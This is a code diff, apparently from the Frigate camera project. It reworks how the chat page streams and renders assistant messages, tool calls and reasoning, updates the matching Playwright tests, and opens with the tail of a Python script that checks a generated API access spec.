spec, counts, flagged, unmatched, normalized = build_spec()
|
||||
problems = validate(spec)
|
||||
rendered = render(spec)
|
||||
|
||||
if args.check:
|
||||
return _check(rendered, problems)
|
||||
|
||||
if problems:
|
||||
logger.error("Refusing to write — generated spec failed validation:")
|
||||
for problem in problems:
|
||||
logger.error(" %s", problem)
|
||||
return 1
|
||||
|
||||
OUTPUT_SPEC.write_text(rendered)
|
||||
_report(counts, flagged, unmatched, normalized)
|
||||
logger.info("\nWrote %s", OUTPUT_SPEC.relative_to(REPO_ROOT))
|
||||
return 0
|
||||
|
||||
|
||||
def _check(rendered: str, problems: list[str]) -> int:
|
||||
name = OUTPUT_SPEC.relative_to(REPO_ROOT)
|
||||
if problems:
|
||||
logger.error("Generated spec failed validation:")
|
||||
for problem in problems:
|
||||
logger.error(" %s", problem)
|
||||
return 1
|
||||
|
||||
current = OUTPUT_SPEC.read_text() if OUTPUT_SPEC.exists() else ""
|
||||
if current == rendered:
|
||||
logger.info("%s is up to date", name)
|
||||
return 0
|
||||
|
||||
logger.error(
|
||||
"%s is out of date. Regenerate with: python3 %s",
|
||||
name,
|
||||
Path(__file__).name,
|
||||
)
|
||||
diff = difflib.unified_diff(
|
||||
current.splitlines(),
|
||||
rendered.splitlines(),
|
||||
fromfile=f"{name} (committed)",
|
||||
tofile=f"{name} (generated)",
|
||||
lineterm="",
|
||||
n=2,
|
||||
)
|
||||
for shown, line in enumerate(diff):
|
||||
if shown >= 60:
|
||||
logger.error(" ... (diff truncated)")
|
||||
break
|
||||
logger.error(" %s", line)
|
||||
return 1
|
||||
|
||||
|
||||
def _report(counts, flagged, unmatched, normalized) -> None:
|
||||
logger.info("Access levels applied:")
|
||||
for level in (PUBLIC, AUTHENTICATED, CAMERA, ADMIN):
|
||||
logger.info(" %-14s %d", level, counts.get(level, 0))
|
||||
logger.info(" %-14s %d", "total", sum(counts.values()))
|
||||
|
||||
if normalized:
|
||||
logger.info("\nStripped volatile timestamp defaults (%d):", len(normalized))
|
||||
for location, value in normalized:
|
||||
logger.info(" %s = %s", location.lstrip("/"), value)
|
||||
|
||||
if flagged:
|
||||
logger.info("\nFlagged for manual confirmation (%d):", len(flagged))
|
||||
for item in flagged:
|
||||
logger.info(" %-6s %s", item["method"], item["path"])
|
||||
logger.info(" -> %s (%s)", item["level"], item["flag"])
|
||||
|
||||
if unmatched:
|
||||
logger.info(
|
||||
"\nOperations with no classification (%d) [unexpected]:", len(unmatched)
|
||||
)
|
||||
for method, path in unmatched:
|
||||
logger.info(" %-6s %s", method, path)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
@@ -12,10 +12,6 @@ dist
|
||||
dist-ssr
|
||||
*.local
|
||||
|
||||
# Playwright
|
||||
playwright-report
|
||||
test-results
|
||||
|
||||
# Editor directories and files
|
||||
.vscode/*
|
||||
!.vscode/extensions.json
|
||||
|
||||
@@ -92,15 +92,6 @@ test.describe("Chat — streaming @medium", () => {
|
||||
await installChatStreamOverride(frigateApp, [
|
||||
{ type: "content", delta: "Hel" },
|
||||
{ type: "content", delta: "lo" },
|
||||
{
|
||||
type: "messages",
|
||||
messages: [
|
||||
{ role: "system", content: "sys" },
|
||||
{ role: "user", content: "hello chat" },
|
||||
{ role: "assistant", content: "Hello" },
|
||||
],
|
||||
},
|
||||
{ type: "done" },
|
||||
]);
|
||||
await frigateApp.goto("/chat");
|
||||
const input = frigateApp.page.getByPlaceholder(/ask/i);
|
||||
@@ -146,15 +137,6 @@ test.describe("Chat — streaming @medium", () => {
|
||||
{ type: "content", delta: "Hel" },
|
||||
{ type: "content", delta: "lo, " },
|
||||
{ type: "content", delta: "world!" },
|
||||
{
|
||||
type: "messages",
|
||||
messages: [
|
||||
{ role: "system", content: "sys" },
|
||||
{ role: "user", content: "greet me" },
|
||||
{ role: "assistant", content: "Hello, world!" },
|
||||
],
|
||||
},
|
||||
{ type: "done" },
|
||||
],
|
||||
{ chunkDelayMs: 50 },
|
||||
);
|
||||
@@ -169,39 +151,19 @@ test.describe("Chat — streaming @medium", () => {
|
||||
});
|
||||
});
|
||||
|
||||
test("tool calls in the chain render a ToolCallsGroup", async ({
|
||||
frigateApp,
|
||||
}) => {
|
||||
const toolTurn = [
|
||||
{ role: "system", content: "sys" },
|
||||
{ role: "user", content: "find people" },
|
||||
test("tool_calls chunks render a ToolCallsGroup", async ({ frigateApp }) => {
|
||||
await installChatStreamOverride(frigateApp, [
|
||||
{
|
||||
role: "assistant",
|
||||
content: null,
|
||||
type: "tool_calls",
|
||||
tool_calls: [
|
||||
{
|
||||
id: "call_1",
|
||||
type: "function",
|
||||
function: {
|
||||
name: "search_objects",
|
||||
arguments: '{"label":"person"}',
|
||||
},
|
||||
name: "search_objects",
|
||||
arguments: { label: "person" },
|
||||
},
|
||||
],
|
||||
},
|
||||
{ role: "tool", tool_call_id: "call_1", content: "[]" },
|
||||
];
|
||||
await installChatStreamOverride(frigateApp, [
|
||||
{ type: "messages", messages: toolTurn },
|
||||
{ type: "content", delta: "Searching for people." },
|
||||
{
|
||||
type: "messages",
|
||||
messages: [
|
||||
...toolTurn,
|
||||
{ role: "assistant", content: "Searching for people." },
|
||||
],
|
||||
},
|
||||
{ type: "done" },
|
||||
]);
|
||||
await frigateApp.goto("/chat");
|
||||
const input = frigateApp.page.getByPlaceholder(/ask/i);
|
||||
@@ -291,15 +253,6 @@ test.describe("Chat — attachment chip @medium", () => {
|
||||
// We use the stream override so the first message completes quickly.
|
||||
await installChatStreamOverride(frigateApp, [
|
||||
{ type: "content", delta: "Done." },
|
||||
{
|
||||
type: "messages",
|
||||
messages: [
|
||||
{ role: "system", content: "sys" },
|
||||
{ role: "user", content: "hello" },
|
||||
{ role: "assistant", content: "Done." },
|
||||
],
|
||||
},
|
||||
{ type: "done" },
|
||||
]);
|
||||
await frigateApp.goto("/chat");
|
||||
|
||||
|
||||
+108
-159
@@ -13,7 +13,6 @@ import { ChatComposer } from "@/components/chat/ChatComposer";
|
||||
import ChatSettings from "@/components/chat/ChatSettings";
|
||||
import type {
|
||||
ChatMessage,
|
||||
ChatStats,
|
||||
GenAIModelsResponse,
|
||||
ShowStatsMode,
|
||||
} from "@/types/chat";
|
||||
@@ -23,28 +22,12 @@ import {
|
||||
getFindSimilarObjectsFromToolCalls,
|
||||
prependAttachment,
|
||||
streamChatCompletion,
|
||||
toolCallsForMessage,
|
||||
toolResponsesById,
|
||||
} from "@/utils/chatUtil";
|
||||
|
||||
type StreamingTurn = {
|
||||
content: string;
|
||||
reasoning: string;
|
||||
chain: ChatMessage[];
|
||||
stats?: ChatStats;
|
||||
};
|
||||
|
||||
const hasText = (content: unknown): content is string =>
|
||||
typeof content === "string" && content.trim().length > 0;
|
||||
|
||||
const toWire = (messages: ChatMessage[]): ChatMessage[] =>
|
||||
messages.map(({ reasoning: _r, stats: _s, ...rest }) => rest);
|
||||
|
||||
export default function ChatPage() {
|
||||
const { t } = useTranslation(["views/chat"]);
|
||||
const [input, setInput] = useState("");
|
||||
const [messages, setMessages] = useState<ChatMessage[]>([]);
|
||||
const [streaming, setStreaming] = useState<StreamingTurn | null>(null);
|
||||
const [isLoading, setIsLoading] = useState(false);
|
||||
const [error, setError] = useState<string | null>(null);
|
||||
const [attachedEventId, setAttachedEventId] = useState<string | null>(null);
|
||||
@@ -89,19 +72,28 @@ export default function ChatPage() {
|
||||
if (isNearBottom) {
|
||||
el.scrollTo({ top: el.scrollHeight, behavior: "smooth" });
|
||||
}
|
||||
}, [messages, streaming, autoScroll]);
|
||||
}, [messages, autoScroll]);
|
||||
|
||||
const submitConversation = useCallback(
|
||||
async (messagesToSend: ChatMessage[]) => {
|
||||
if (isLoading) return;
|
||||
const last = messagesToSend[messagesToSend.length - 1];
|
||||
if (!last || last.role !== "user" || !hasText(last.content)) return;
|
||||
if (!last || last.role !== "user" || !last.content.trim()) return;
|
||||
|
||||
setError(null);
|
||||
setMessages(messagesToSend);
|
||||
setStreaming({ content: "", reasoning: "", chain: [] });
|
||||
const assistantPlaceholder: ChatMessage = {
|
||||
role: "assistant",
|
||||
content: "",
|
||||
toolCalls: undefined,
|
||||
};
|
||||
setMessages([...messagesToSend, assistantPlaceholder]);
|
||||
setIsLoading(true);
|
||||
|
||||
const apiMessages = messagesToSend.map((m) => ({
|
||||
role: m.role,
|
||||
content: m.content,
|
||||
}));
|
||||
|
||||
const baseURL = axios.defaults.baseURL ?? "";
|
||||
const url = `${baseURL}chat/completion`;
|
||||
const headers: Record<string, string> = {
|
||||
@@ -112,50 +104,16 @@ export default function ChatPage() {
|
||||
const controller = new AbortController();
|
||||
abortRef.current = controller;
|
||||
|
||||
let chain: ChatMessage[] = [];
|
||||
let stats: ChatStats | undefined;
|
||||
let reasoning = "";
|
||||
let hadError = false;
|
||||
|
||||
await streamChatCompletion(
|
||||
url,
|
||||
headers,
|
||||
toWire(messagesToSend),
|
||||
apiMessages,
|
||||
{
|
||||
onContentDelta: (delta) =>
|
||||
setStreaming((s) => (s ? { ...s, content: s.content + delta } : s)),
|
||||
onReasoningDelta: (delta) => {
|
||||
reasoning += delta;
|
||||
setStreaming((s) =>
|
||||
s ? { ...s, reasoning: s.reasoning + delta } : s,
|
||||
);
|
||||
},
|
||||
onChain: (fullChain) => {
|
||||
chain = fullChain;
|
||||
setStreaming((s) => (s ? { ...s, chain: fullChain } : s));
|
||||
},
|
||||
onStats: (s) => {
|
||||
stats = s;
|
||||
setStreaming((cur) => (cur ? { ...cur, stats: s } : cur));
|
||||
},
|
||||
onError: (message) => {
|
||||
hadError = true;
|
||||
setError(message);
|
||||
},
|
||||
updateMessages: (updater) => setMessages(updater),
|
||||
onError: (message) => setError(message),
|
||||
onDone: () => {
|
||||
abortRef.current = null;
|
||||
setIsLoading(false);
|
||||
setStreaming(null);
|
||||
const lastMsg = chain[chain.length - 1];
|
||||
if (!hadError && lastMsg?.role === "assistant") {
|
||||
setMessages(
|
||||
chain.map((m, i) =>
|
||||
i === chain.length - 1
|
||||
? { ...m, reasoning: reasoning || undefined, stats }
|
||||
: m,
|
||||
),
|
||||
);
|
||||
}
|
||||
},
|
||||
defaultErrorMessage: t("error"),
|
||||
},
|
||||
@@ -167,14 +125,12 @@ export default function ChatPage() {
|
||||
);
|
||||
|
||||
const recentEventIds = useMemo(() => {
|
||||
const responses = toolResponsesById(messages);
|
||||
for (let i = messages.length - 1; i >= 0; i--) {
|
||||
const msg = messages[i];
|
||||
if (msg.role !== "assistant" || !msg.tool_calls?.length) continue;
|
||||
const calls = toolCallsForMessage(msg, responses);
|
||||
const similar = getFindSimilarObjectsFromToolCalls(calls);
|
||||
if (msg.role !== "assistant" || !msg.toolCalls) continue;
|
||||
const similar = getFindSimilarObjectsFromToolCalls(msg.toolCalls);
|
||||
if (similar) return similar.results.map((e) => e.id);
|
||||
const events = getEventIdsFromSearchObjectsToolCalls(calls);
|
||||
const events = getEventIdsFromSearchObjectsToolCalls(msg.toolCalls);
|
||||
if (events.length > 0) return events.map((e) => e.id);
|
||||
}
|
||||
return [];
|
||||
@@ -198,14 +154,12 @@ export default function ChatPage() {
|
||||
abortRef.current?.abort();
|
||||
abortRef.current = null;
|
||||
setIsLoading(false);
|
||||
setStreaming(null);
|
||||
}, []);
|
||||
|
||||
const startNewChat = useCallback(() => {
|
||||
abortRef.current?.abort();
|
||||
abortRef.current = null;
|
||||
setIsLoading(false);
|
||||
setStreaming(null);
|
||||
setMessages([]);
|
||||
setInput("");
|
||||
setAttachedEventId(null);
|
||||
@@ -227,83 +181,7 @@ export default function ChatPage() {
|
||||
setAttachedEventId(null);
|
||||
}, []);
|
||||
|
||||
const hasStarted = messages.length > 0 || streaming != null;
|
||||
|
||||
// While streaming, the backend's in-flight chain is the source of truth;
|
||||
// otherwise the committed conversation is.
|
||||
const renderList =
|
||||
streaming && streaming.chain.length ? streaming.chain : messages;
|
||||
const responses = toolResponsesById(renderList);
|
||||
const renderTail = renderList[renderList.length - 1];
|
||||
const finalShown =
|
||||
renderTail?.role === "assistant" && hasText(renderTail.content);
|
||||
|
||||
const renderMessage = (msg: ChatMessage, i: number) => {
|
||||
if (msg.role === "system" || msg.role === "tool") return null;
|
||||
|
||||
if (msg.role === "user") {
|
||||
if (!hasText(msg.content)) return null;
|
||||
return (
|
||||
<div key={i} className="flex flex-col gap-2">
|
||||
<MessageBubble
|
||||
role="user"
|
||||
content={msg.content}
|
||||
messageIndex={i}
|
||||
onEditSubmit={handleEditSubmit}
|
||||
isComplete
|
||||
showStats={showStats}
|
||||
/>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
const calls = toolCallsForMessage(msg, responses);
|
||||
const contentText = hasText(msg.content) ? msg.content : "";
|
||||
const similar = getFindSimilarObjectsFromToolCalls(calls);
|
||||
const events = similar ? [] : getEventIdsFromSearchObjectsToolCalls(calls);
|
||||
|
||||
return (
|
||||
<div key={i} className="flex flex-col gap-2">
|
||||
{calls.length > 0 && <ToolCallsGroup toolCalls={calls} />}
|
||||
{hasText(msg.reasoning) && (
|
||||
<ReasoningBubble
|
||||
reasoning={msg.reasoning}
|
||||
answerStarted={!!contentText}
|
||||
/>
|
||||
)}
|
||||
{contentText && (
|
||||
<MessageBubble
|
||||
role="assistant"
|
||||
content={contentText}
|
||||
messageIndex={i}
|
||||
isComplete
|
||||
stats={msg.stats}
|
||||
showStats={showStats}
|
||||
/>
|
||||
)}
|
||||
{similar ? (
|
||||
<ChatEventThumbnailsRow
|
||||
events={similar.results}
|
||||
anchor={similar.anchor}
|
||||
onAttach={setAttachedEventId}
|
||||
/>
|
||||
) : (
|
||||
<ChatEventThumbnailsRow
|
||||
events={events}
|
||||
onAttach={setAttachedEventId}
|
||||
/>
|
||||
)}
|
||||
</div>
|
||||
);
|
||||
};
|
||||
|
||||
const processingDots = (
|
||||
<div className="flex items-center gap-2 self-start rounded-2xl bg-muted px-5 py-4">
|
||||
<span className="size-2.5 animate-bounce rounded-full bg-muted-foreground/60 [animation-delay:-0.32s]" />
|
||||
<span className="size-2.5 animate-bounce rounded-full bg-muted-foreground/60 [animation-delay:-0.16s]" />
|
||||
<span className="size-2.5 animate-bounce rounded-full bg-muted-foreground/60" />
|
||||
</div>
|
||||
);
|
||||
const hasStarted = messages.length > 0;
|
||||
|
||||
return (
|
||||
<div className="flex size-full flex-col">
|
||||
@@ -334,31 +212,102 @@ export default function ChatPage() {
|
||||
<div className="flex w-full flex-col xl:w-[50%] 3xl:w-[35%]">
|
||||
{hasStarted ? (
|
||||
<div className="flex w-full flex-1 flex-col gap-3 pb-3">
|
||||
{renderList.map((msg, i) => renderMessage(msg, i))}
|
||||
{streaming &&
|
||||
!finalShown &&
|
||||
(streaming.content || streaming.reasoning ? (
|
||||
<div className="flex flex-col gap-2">
|
||||
{hasText(streaming.reasoning) && (
|
||||
{messages.map((msg, i) => {
|
||||
const isLastAssistant =
|
||||
i === messages.length - 1 && msg.role === "assistant";
|
||||
const isComplete =
|
||||
msg.role === "user" || !isLoading || !isLastAssistant;
|
||||
const hasToolCalls =
|
||||
msg.toolCalls && msg.toolCalls.length > 0;
|
||||
const hasContent = !!msg.content?.trim();
|
||||
const hasReasoning = !!msg.reasoning?.trim();
|
||||
const showProcessing =
|
||||
isLastAssistant &&
|
||||
isLoading &&
|
||||
!hasContent &&
|
||||
!hasReasoning;
|
||||
|
||||
// Hide empty placeholder only when there are no tool calls
|
||||
// and no reasoning streaming yet
|
||||
if (
|
||||
isLastAssistant &&
|
||||
isLoading &&
|
||||
!hasContent &&
|
||||
!hasToolCalls &&
|
||||
!hasReasoning
|
||||
)
|
||||
return (
|
||||
<div
|
||||
key={i}
|
||||
className="flex items-center gap-2 self-start rounded-2xl bg-muted px-5 py-4"
|
||||
>
|
||||
<span className="size-2.5 animate-bounce rounded-full bg-muted-foreground/60 [animation-delay:-0.32s]" />
|
||||
<span className="size-2.5 animate-bounce rounded-full bg-muted-foreground/60 [animation-delay:-0.16s]" />
|
||||
<span className="size-2.5 animate-bounce rounded-full bg-muted-foreground/60" />
|
||||
</div>
|
||||
);
|
||||
|
||||
return (
|
||||
<div key={i} className="flex flex-col gap-2">
|
||||
{msg.role === "assistant" && hasToolCalls && (
|
||||
<ToolCallsGroup toolCalls={msg.toolCalls!} />
|
||||
)}
|
||||
{msg.role === "assistant" && hasReasoning && (
|
||||
<ReasoningBubble
|
||||
reasoning={streaming.reasoning}
|
||||
answerStarted={!!streaming.content}
|
||||
reasoning={msg.reasoning!}
|
||||
answerStarted={hasContent}
|
||||
/>
|
||||
)}
|
||||
{streaming.content && (
|
||||
{showProcessing ? (
|
||||
<div className="flex items-center gap-2 self-start rounded-2xl bg-muted px-5 py-4">
|
||||
<span className="size-2 animate-bounce rounded-full bg-muted-foreground/60 [animation-delay:-0.3s]" />
|
||||
<span className="size-2 animate-bounce rounded-full bg-muted-foreground/60 [animation-delay:-0.15s]" />
|
||||
<span className="size-2 animate-bounce rounded-full bg-muted-foreground/60" />
|
||||
</div>
|
||||
) : msg.role === "assistant" &&
|
||||
!hasContent &&
|
||||
hasReasoning &&
|
||||
!isComplete ? null : (
|
||||
<MessageBubble
|
||||
role="assistant"
|
||||
content={streaming.content}
|
||||
messageIndex={-1}
|
||||
isComplete={false}
|
||||
stats={streaming.stats}
|
||||
role={msg.role}
|
||||
content={msg.content}
|
||||
messageIndex={i}
|
||||
onEditSubmit={
|
||||
msg.role === "user" ? handleEditSubmit : undefined
|
||||
}
|
||||
isComplete={isComplete}
|
||||
stats={msg.stats}
|
||||
showStats={showStats}
|
||||
/>
|
||||
)}
|
||||
{msg.role === "assistant" &&
|
||||
isComplete &&
|
||||
(() => {
|
||||
const similar = getFindSimilarObjectsFromToolCalls(
|
||||
msg.toolCalls,
|
||||
);
|
||||
if (similar) {
|
||||
return (
|
||||
<ChatEventThumbnailsRow
|
||||
events={similar.results}
|
||||
anchor={similar.anchor}
|
||||
onAttach={setAttachedEventId}
|
||||
/>
|
||||
);
|
||||
}
|
||||
const events = getEventIdsFromSearchObjectsToolCalls(
|
||||
msg.toolCalls,
|
||||
);
|
||||
return (
|
||||
<ChatEventThumbnailsRow
|
||||
events={events}
|
||||
onAttach={setAttachedEventId}
|
||||
/>
|
||||
);
|
||||
})()}
|
||||
</div>
|
||||
) : (
|
||||
processingDots
|
||||
))}
|
||||
);
|
||||
})}
|
||||
{error && (
|
||||
<p
|
||||
className="flex items-center gap-1.5 self-start text-sm text-destructive"
|
||||
|
||||
+8
-21
@@ -1,30 +1,17 @@
|
||||
export type ToolCallFunction = {
|
||||
name: string;
|
||||
arguments: string;
|
||||
};
|
||||
|
||||
export type WireToolCall = {
|
||||
id: string;
|
||||
type?: string;
|
||||
function: ToolCallFunction;
|
||||
};
|
||||
|
||||
export type ChatMessage = {
|
||||
role: "system" | "user" | "assistant" | "tool";
|
||||
content: unknown;
|
||||
tool_call_id?: string;
|
||||
name?: string;
|
||||
tool_calls?: WireToolCall[];
|
||||
reasoning?: string;
|
||||
stats?: ChatStats;
|
||||
};
|
||||
|
||||
export type ToolCall = {
|
||||
name: string;
|
||||
arguments?: Record<string, unknown>;
|
||||
response?: string;
|
||||
};
|
||||
|
||||
export type ChatMessage = {
|
||||
role: "user" | "assistant";
|
||||
content: string;
|
||||
reasoning?: string;
|
||||
toolCalls?: ToolCall[];
|
||||
stats?: ChatStats;
|
||||
};
|
||||
|
||||
export type StartingRequest = {
|
||||
label: string;
|
||||
prompt: string;
|
||||
|
||||
+85
-65
@@ -1,20 +1,16 @@
|
||||
import type { ChatMessage, ChatStats, ToolCall } from "@/types/chat";
|
||||
|
||||
export type StreamChatCallbacks = {
|
||||
/** Streamed delta of the assistant's final answer text. */
|
||||
onContentDelta: (delta: string) => void;
|
||||
/** Streamed delta of the assistant's reasoning trace. */
|
||||
onReasoningDelta: (delta: string) => void;
|
||||
/** The full conversation chain so far (system message, history, this turn's
|
||||
* tool-call turns, tool results, and — on the final emission — the final
|
||||
* assistant message). */
|
||||
onChain: (chain: ChatMessage[]) => void;
|
||||
/** Token/timing stats for the turn. */
|
||||
onStats: (stats: ChatStats) => void;
|
||||
/** Update the messages array (e.g. pass to setState). */
|
||||
updateMessages: (updater: (prev: ChatMessage[]) => ChatMessage[]) => void;
|
||||
/** Called when the stream sends an error or fetch fails. */
|
||||
onError: (message: string) => void;
|
||||
/** Called when the stream finishes (success or error). */
|
||||
onDone: () => void;
|
||||
/** Called when the stream emits token/timing stats. The stats are also
|
||||
* attached to the last assistant message in updateMessages, so consumers
|
||||
* can usually rely on the message itself rather than wiring this up. */
|
||||
onStats?: (stats: ChatStats) => void;
|
||||
/** Message used when fetch throws and no server error is available. */
|
||||
defaultErrorMessage?: string;
|
||||
};
|
||||
@@ -29,7 +25,7 @@ type StatsChunk = {
|
||||
|
||||
type StreamChunk =
|
||||
| { type: "error"; error: string }
|
||||
| { type: "messages"; messages: ChatMessage[] }
|
||||
| { type: "tool_calls"; tool_calls: ToolCall[] }
|
||||
| { type: "content"; delta: string }
|
||||
| { type: "reasoning"; delta: string }
|
||||
| StatsChunk;
|
||||
@@ -45,18 +41,16 @@ export type StreamChatOptions = {
|
||||
export async function streamChatCompletion(
|
||||
url: string,
|
||||
headers: Record<string, string>,
|
||||
apiMessages: ChatMessage[],
|
||||
apiMessages: { role: string; content: string }[],
|
||||
callbacks: StreamChatCallbacks,
|
||||
signal?: AbortSignal,
|
||||
options: StreamChatOptions = {},
|
||||
): Promise<void> {
|
||||
const {
|
||||
onContentDelta,
|
||||
onReasoningDelta,
|
||||
onChain,
|
||||
onStats,
|
||||
updateMessages,
|
||||
onError,
|
||||
onDone,
|
||||
onStats,
|
||||
defaultErrorMessage = "Something went wrong. Please try again.",
|
||||
} = callbacks;
|
||||
|
||||
@@ -97,27 +91,65 @@ export async function streamChatCompletion(
|
||||
const applyChunk = (data: StreamChunk) => {
|
||||
if (data.type === "error") {
|
||||
onError(data.error);
|
||||
updateMessages((prev) =>
|
||||
prev.filter((m) => !(m.role === "assistant" && m.content === "")),
|
||||
);
|
||||
return "break";
|
||||
}
|
||||
if (data.type === "messages") {
|
||||
onChain(data.messages ?? []);
|
||||
if (data.type === "tool_calls" && data.tool_calls?.length) {
|
||||
updateMessages((prev) => {
|
||||
const next = [...prev];
|
||||
const lastMsg = next[next.length - 1];
|
||||
if (lastMsg?.role === "assistant")
|
||||
next[next.length - 1] = {
|
||||
...lastMsg,
|
||||
toolCalls: data.tool_calls,
|
||||
};
|
||||
return next;
|
||||
});
|
||||
return "continue";
|
||||
}
|
||||
if (data.type === "content" && data.delta !== undefined) {
|
||||
onContentDelta(data.delta);
|
||||
updateMessages((prev) => {
|
||||
const next = [...prev];
|
||||
const lastMsg = next[next.length - 1];
|
||||
if (lastMsg?.role === "assistant")
|
||||
next[next.length - 1] = {
|
||||
...lastMsg,
|
||||
content: lastMsg.content + data.delta,
|
||||
};
|
||||
return next;
|
||||
});
|
||||
return "continue";
|
||||
}
|
||||
if (data.type === "reasoning" && data.delta !== undefined) {
|
||||
onReasoningDelta(data.delta);
|
||||
updateMessages((prev) => {
|
||||
const next = [...prev];
|
||||
const lastMsg = next[next.length - 1];
|
||||
if (lastMsg?.role === "assistant")
|
||||
next[next.length - 1] = {
|
||||
...lastMsg,
|
||||
reasoning: (lastMsg.reasoning ?? "") + data.delta,
|
||||
};
|
||||
return next;
|
||||
});
|
||||
return "continue";
|
||||
}
|
||||
if (data.type === "stats") {
|
||||
onStats({
|
||||
const stats: ChatStats = {
|
||||
promptTokens: data.prompt_tokens,
|
||||
completionTokens: data.completion_tokens,
|
||||
completionDurationMs: data.completion_duration_ms,
|
||||
tokensPerSecond: data.tokens_per_second,
|
||||
};
|
||||
updateMessages((prev) => {
|
||||
const next = [...prev];
|
||||
const lastMsg = next[next.length - 1];
|
||||
if (lastMsg?.role === "assistant")
|
||||
next[next.length - 1] = { ...lastMsg, stats };
|
||||
return next;
|
||||
});
|
||||
onStats?.(stats);
|
||||
return "continue";
|
||||
}
|
||||
return "continue";
|
||||
@@ -133,8 +165,9 @@ export async function streamChatCompletion(
|
||||
const trimmed = line.trim();
|
||||
if (!trimmed) continue;
|
||||
try {
|
||||
const data = JSON.parse(trimmed) as StreamChunk;
|
||||
if (applyChunk(data) === "break") {
|
||||
const data = JSON.parse(trimmed) as StreamChunk & { type: string };
|
||||
const result = applyChunk(data as StreamChunk);
|
||||
if (result === "break") {
|
||||
hadStreamError = true;
|
||||
break;
|
||||
}
|
||||
@@ -148,63 +181,50 @@ export async function streamChatCompletion(
|
||||
// Flush remaining buffer
|
||||
if (!hadStreamError && buffer.trim()) {
|
||||
try {
|
||||
const data = JSON.parse(buffer.trim()) as StreamChunk;
|
||||
applyChunk(data);
|
||||
const data = JSON.parse(buffer.trim()) as StreamChunk & {
|
||||
type: string;
|
||||
delta?: string;
|
||||
};
|
||||
if (data.type === "content" && data.delta !== undefined) {
|
||||
updateMessages((prev) => {
|
||||
const next = [...prev];
|
||||
const lastMsg = next[next.length - 1];
|
||||
if (lastMsg?.role === "assistant")
|
||||
next[next.length - 1] = {
|
||||
...lastMsg,
|
||||
content: lastMsg.content + data.delta!,
|
||||
};
|
||||
return next;
|
||||
});
|
||||
}
|
||||
} catch {
|
||||
// ignore final malformed chunk
|
||||
}
|
||||
}
|
||||
|
||||
if (!hadStreamError) {
|
||||
updateMessages((prev) => {
|
||||
const next = [...prev];
|
||||
const lastMsg = next[next.length - 1];
|
||||
if (lastMsg?.role === "assistant" && lastMsg.content === "")
|
||||
next[next.length - 1] = { ...lastMsg, content: " " };
|
||||
return next;
|
||||
});
|
||||
}
|
||||
} catch (err) {
|
||||
if (err instanceof DOMException && err.name === "AbortError") {
|
||||
// User stopped generation — not an error
|
||||
} else {
|
||||
onError(defaultErrorMessage);
|
||||
updateMessages((prev) =>
|
||||
prev.filter((m) => !(m.role === "assistant" && m.content === "")),
|
||||
);
|
||||
}
|
||||
} finally {
|
||||
onDone();
|
||||
}
|
||||
}
|
||||
|
||||
/** Map each tool result message to its tool_call_id for response lookup. */
|
||||
export function toolResponsesById(
|
||||
messages: ChatMessage[],
|
||||
): Map<string, string> {
|
||||
const map = new Map<string, string>();
|
||||
for (const m of messages) {
|
||||
if (m.role === "tool" && typeof m.tool_call_id === "string") {
|
||||
map.set(
|
||||
m.tool_call_id,
|
||||
typeof m.content === "string" ? m.content : JSON.stringify(m.content),
|
||||
);
|
||||
}
|
||||
}
|
||||
return map;
|
||||
}
|
||||
|
||||
/** Derive the display tool calls for one assistant message. */
|
||||
export function toolCallsForMessage(
|
||||
message: ChatMessage,
|
||||
responses: Map<string, string>,
|
||||
): ToolCall[] {
|
||||
if (!message.tool_calls?.length) return [];
|
||||
return message.tool_calls.map((tc) => {
|
||||
let args: Record<string, unknown> | undefined;
|
||||
const raw = tc.function?.arguments;
|
||||
if (typeof raw === "string") {
|
||||
try {
|
||||
args = JSON.parse(raw) as Record<string, unknown>;
|
||||
} catch {
|
||||
args = undefined;
|
||||
}
|
||||
}
|
||||
return {
|
||||
name: tc.function?.name ?? "",
|
||||
arguments: args,
|
||||
response: responses.get(tc.id),
|
||||
};
|
||||
});
|
||||
}
|
||||
|
||||
/**
|
||||
* Parse search_objects tool call response(s) into event ids for thumbnails.
|
||||
*/
|
||||
|
||||
Reference in New Issue
Block a user